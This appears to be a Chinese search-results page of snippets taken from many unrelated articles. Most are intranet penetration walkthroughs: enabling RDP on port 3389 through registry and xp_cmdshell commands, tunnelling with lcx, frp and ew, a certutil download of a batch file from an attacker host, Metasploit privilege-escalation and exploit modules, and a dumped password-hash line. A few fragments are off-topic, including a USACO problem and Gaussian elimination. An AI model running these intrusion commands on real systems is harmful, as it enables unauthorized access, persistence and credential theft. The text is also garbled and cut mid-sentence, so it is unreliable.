直接上脚本吧,多线程,加了队列,然后尝试用不同的banner头去连接1-65535端口,如果开放,总有一个是的,当从注册表无法读取RDP端口的时候。 #!/u...
3389: [Usaco2004 Dec]Cleaning Shifts安排值班 Time Limit: 1 Sec Memory Limit: 128 MB Submit: 102 Solved:...保留一个起始时间最长的即可,于是我们开始进行贪心 1 /************************************************************** 2 Problem: 3389...phile神犇的离散化点子么么哒) 1 /************************************************************** 2 Problem: 3389
get shell ---- 进入内网 关于发现内网主机以及代理的问题,在“浅析内网渗透”一文中有解释: 这里不再赘述,只是演示相关操作。 ?...ipconfig 双网卡,可知内网ip段时192.168.52.x,进行域渗透最好连接3389。...但是3389连接不上,估计是开了防火墙…… 可以选择msf的shell关闭防火墙,或者是使用ngrok隧道连接3389。...| 手把手教你如何进行内网渗透 或者参考上篇内网渗透msf mimikatz抓取明文。...涉及的比较重要的是如何开3389,如何关闭防火墙,如何得到域控的密码以及17_010无法反弹shell时怎么办。 拿到域控后提权导密码,结束。 ?
百度一下,原来对面的服务器是在内网中,没有做映射是连接不到的,但是可以借助一个工具进行端口转发来实现连接处于内网的3389服务器,原文链接(百度搜索lcx第一条出现的):http://sec.chinabyte.com...关于 那篇文章大概意思是说连接内网的3389需要4步: 1:确定被控制计算机的内网ip 2:被控制的计算机执行”lcx -slave 你的计算机ip 51 被控制计算机的ip 3389”...其实不然,有些特殊情况是可以反过来用的:对面开监听我们执行slave,在对面我们看来是反向连接了,但是在我们看来我们是去正向连接的(就像你直接访问对面的3389),防火墙也不会拦截,这样这可以连接成功,...假设2: 1、 你拿下了两台内网服务器A和B 2、 服务器B不能访问任何机器(自己的话当然可以了),只能让别人访问 遇到这种情况比较好处理,只需参考上面一个假设就能上网了,B开listen ,A...再说一个实例: 有一次渗透中遇到了一个比较蛋疼的情况,有一台服务器我3389上去了但是上面有一个防火墙软件,有个特性:允许连接内网的请求,不能直接访问外网。 我的目的是抓密码。
https://pan.baidu.com/s/1Rt3ZFXY0sOD5okeb9VI3_A
文章前言 在渗透测试中信息收集的深度与广度以及对关键信息的提取,直接或间接的决定了渗透测试的质量,本篇文章主要对内网中信息收集做一个简单的归纳以及介绍 主机信息 在内网渗透测试中,当我们拿下一台或多台可控的主机...(大多数情况下都是边界主机)时,我们首先要对当前主机的信息进行简易收集,常见的信息包括以下几个方面: 网络配置 通过执行以下命令查看当前机器是否处于内网,以及内网网段是多少,以及DNS地址、域名信息等等...开3389 首先,我们需要确定远程连接的端口(一般是3389),在cmd下使用注册表查询语句,命令如下,得到连接端口为0xd3d,转换后为3389,如下图所示: REG QUERY "HKEY_LOCAL_MACHINE...在 Windows Server 2003 中开启 3389 端口: 首先,查看开启的端口——没有开启3389端口 ?...成功开启3389端口: ? 在 Windows Server 2008 和 Windows Server 2012 中开启 3389 端口 查看当前开发端口———未开放3389端口 ?
-urlcache -split -f http://10.10.10.1/3389.bat 3389.bat 另外如果是win7以上系统,就不得不提到powershell了。....bat开3389,建账号。...31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:20ac9ba0dd7f155c324c6ed1e021205b:38316494a911622d58a3e45b33bea9ce::: 开3389...\RDP-Tcp]>>3389.reg echo "PortNumber"=dword:00000d3d>>3389.reg regedit /s 3389.reg del 3389.reg 或者一条命令...lcx.exe -listen 5115 33891 攻击者远程连接:127.0.0.1:33891 LCX端口实现内网连接: 配置方式: 内网服务器当成上述场景受害者ip 公网服务器当成上述场景攻击者
直接getsystem是不行的,用suggester来试一下 这里选择用ms16_075来提权 SQL Server Privilege Escalation 看到还有一个网卡,是有内网的,加个用户开...3389上去看一下 看到确实有三个网站在运行,有一个是.net的,但是本机没有sql server,考虑是不是站库分离的情况。...直接aspx马连一家伙 添加一下xp_cmdshell执行命令 136应该是sql sever ip,先xp_cmdshell强开一波3389 reg add "HKEY_LOCAL_MACHINE...这里注意,如果ew比较麻烦,不太好上传,那我们可以在msf添加了路由之后,使用auxiliary/server/socks4a这个模块,用msf开个socks代理,这样本机可以通过msf的路由来访问内网...Intranet Web Information Gathering 看到一台129,我也不做探测了,看起来就那么一两台,如果要探测内网的话可以proxychains配合nmap或者msf添加路由后本身就可以完成
看到还有一个网卡,是有内网的,加个用户开3389上去看一下: ? ? 看到确实有三个网站在运行,有一个是.net的,但是本机没有sql server,考虑是不是站库分离的情况。 ?...136应该是sql sever ip,先xp_cmdshell强开一波3389: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control...SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389...这里注意,如果ew比较麻烦,不太好上传,那我们可以在msf添加了路由之后,使用auxiliary/server/socks4a这个模块,用msf开个socks代理,这样本机可以通过msf的路由来访问内网...看到一台129,我也不做探测了,看起来就那么一两台,如果要探测内网的话可以proxychains配合nmap或者msf添加路由后本身就可以完成。同样的,用ew做了层代理。
iis7远程桌面小编在开始讨论什么是端口之前,让我们先讨论一下什么是端口?我经常在Internet上听到我的主机打开了多少个端口,这些端口会被入侵!或者说“打开...
/dirty 123 提权成功,使用 firefart 用户进行登录,密码为123 接着进行内网信息搜集,发现机器为双网卡 通过ping发现机器出网 上传 frp 搭建代理隧道 proxifier...,因此寻找其他的方法 接着通过 tasklsit /svc 进行杀软识别,机器上无杀软 由于内网不出网,这里在linux机器上开启http服务,把mimikatz扔上去 然后使用powershell...REG_DWORD /d 0 /f 修改完注册表的话需要重启,但重启之后上面登着的进程也没了,意义不大 这里初步判断192.168.93.10为域控,尝试使用CVE-2020-1472,由于代理不太稳定,靶机直接开3389.../t REG_DWORD /d 00000000 /f #执行以下命令操作注册表来关闭机器3389远程桌面服务 REG ADD HKLM\SYSTEM\CurrentControlSet\Control.../t REG_DWORD /d 11111111 /f #使用以下命令添加防火墙放行策略 netsh firewall add portopening protocol = TCP port = 3389
可能是策略设置了禁止控制台空密码登录 添加个用户 添加到管理员组里(建议还是别这样做,动作太大了),再直接用cs开一个socks4的通道到服务器上,之后再用任意代理工具连接上socks4的通道就可以直接连接内网...,同时根据之前ipconfig发现三张网卡 两张网卡没有配好都是169的,直接确定目标10.0.0.33,再次感谢管理员他还帮我开了3389。...wmic RDTOGGLE WHERE ServerName=”%COMPUTERNAME%” call SetAllowTSConnections 1 开socks4 代理连接 连接内网3389
get shell 到这里呢,想了想我们的目标是内网,并且防火墙没开,就不考虑提权了。 ---- 0x02 跳板及内网探测 现在的目标是将此DMZ服务器当作跳板并探测内网的服务器。...admin 123456 这个cms呢,后台可以getshell,我是被卡在burpsuite抓包上面,开了burpsuite总是无法访问,后来才发现,在burpsuite里面设置了socks代理就没必要再开proxifier...第二种方法 如上配置后,就不需要再开socks代理工具了,否则会出现问题。 ? 在后台添加php允许上传,再去上传点,不要传php因为判断了Content-Type。 ?...可以看到开了135、445、3389,啥都不说了,永恒之蓝打一波。 0x4 第三层内网渗透 ? ?...3389 至此呢,本次内网渗透就完成了。
题目背景 Gauss消元 题目描述 给定一个线性方程组,对其求解 输入输出格式 输入格式: 第一行,一个正整数 nn 第二至 n+1n+1行,每行 n+1n+1...
"Server /v fDenyTSConnections /t REG_DWORD /d 0 /f (实测没问题) Kali远程桌面连接Win7 rdesktop 192.168.194.129:3389...如果选择取消将连接不上,但这样的交互性太强了,容易被发现,因此开启完3389端口后可以用metasploit中的cve-2019-0708模块进行攻击获取shell(这里前提是目标机不是普通的家庭版,要支持远程连接
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。...由于我们学校的校园网封死了许多远程连接的软件,而开热点再使用向日葵等远程连接工具又不方便(主要是实验室信号不太好),正好又有一台云服务器,可以提供一个公网 IP,就简单研究了一下 Frp。...# 名字可以设一个自己好记的 type = tcp # 连接类型 local_ip = 127.0.0.1 # 本机地址 local_port = 3389...# 要穿透的端口 remote_port = 6666 # 服务器端口(修改) 如此设置后,frp 会将请求 x.x.x.x:9999 的流量转发到内网机器的 3389...3389 端口是 Windows Server 远程桌面的服务端口,可以通过这个端口,用"远程桌面"等连接工具来连接到远程的服务器,如果连接上了,输入系统管理员的用户名和密码后,将变得可以像操作本机一样操作远程的电脑
MSSQL,启用xp_cmdshell组件执行命令加一个管理员用户,再利用portfwd命令将它的3389端口转发出来。...192.168.0.206的3389端口给转发出来,且能够正常连接它的3389远程终端了,相关命令参数如下,当时忘了截图!...切记不要把开代理和代理工具弄混了!!!...这里笔者主要就扫了这几个常见端口:21/22/445/1433/3306/3389来做演示。...,只有Webshell权限,这时可以采用迂回战术,先进入内网搜集密码组合字典,然后再去搞我们的目标主机; 内网中MSF可以扫描A、B段主机吗?
要登录到这台远程计算机,您必须被授予允许通过终端服务登录的权限。默认地,“远程桌面用户”组的成员拥有该权限,如果您不是“远程桌面用户”组或其他拥有该权限的组的成...
search ms12_020 use exploit/dos/windows/rdp/ms12_020_maxchannelids set rhost 192...
领取专属 10元无门槛券
手把手带您无忧上云